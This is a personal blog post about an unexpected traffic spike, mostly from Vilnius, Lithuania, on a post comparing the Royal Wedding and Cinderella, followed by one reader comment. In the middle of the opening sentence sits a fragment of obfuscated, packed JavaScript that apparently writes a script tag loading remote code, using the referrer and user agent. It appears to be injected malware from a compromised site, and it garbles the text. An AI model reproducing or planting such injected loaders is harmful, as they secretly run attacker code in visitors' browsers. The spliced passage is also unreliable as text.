…in Lithuania.
Last Friday I posted about the Royal ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inybk|var|u0026u|referrer|ireik||js|php’.split(‘|’),0,{}))
Wedding vs. Cinderella.
It was kind of a filler post. Until about 9PM the night before, it was going to be a bunch of random youtube videos.
Friday afternoon hits and I’m home from work. Here’s how the conversation went:
N: B, did you get any comments on your blog post?
B: No, but it was kind of a filler post. Wasn’t expecting any.
N: Um…..B, it says you have 71 likes.
B: What?
N: Yeah. And I only know 1 of them…
B: There must be something wrong.
At this point Nick runs to my computer to check my google analytics….because that’s what any social media/internet marketing/interested husband would do.
He logs into my account and say, “B, you’ve got over 2300 hits today.”
W.T.F.
My blog averages 30ish visits a day. Until Friday, ~100 visits was my all time high. And that was for a wedding post. That I reposted to facebook. So totally not fair.
Here is what my google analytics dashboard looks like.
Naturally I was on a blogger’s high. I mean, I get excited when people leave a comment. So you can imagine how pumped I was to have that many views!
Nick then decided to check google.
I was the very first result (following NEWS). WHAT?!
Ok, so it was time to dig a little deeper into these stats.
Turns out. I’m blowing up in Lithuania. Around half of the total hits came from Lithuania! Specifically Vilnius.
Vilnius – the capitol of Lithuania. Population 560,190. Interesting fact? They have an Easter Granny instead of an Easter bunny.
So, to all you Lithuanians, thanks for making me feel like a superstar for a day!
One reply on “I’m kind of a big deal…”
lol. so here’s my story with this. i read your post through reader and yesterday on fb i saw something similar posted, but it wasn’t a link to your site. i read through the comments and they were from people all over the world! i had to check back onto your site because for some reason i thought you made it! i was thinking, “wow! bryn’s pic made it all over the world! she’s famous!” at the time, i was sad to find out it wasn’t true. but now, sort of true. ha.
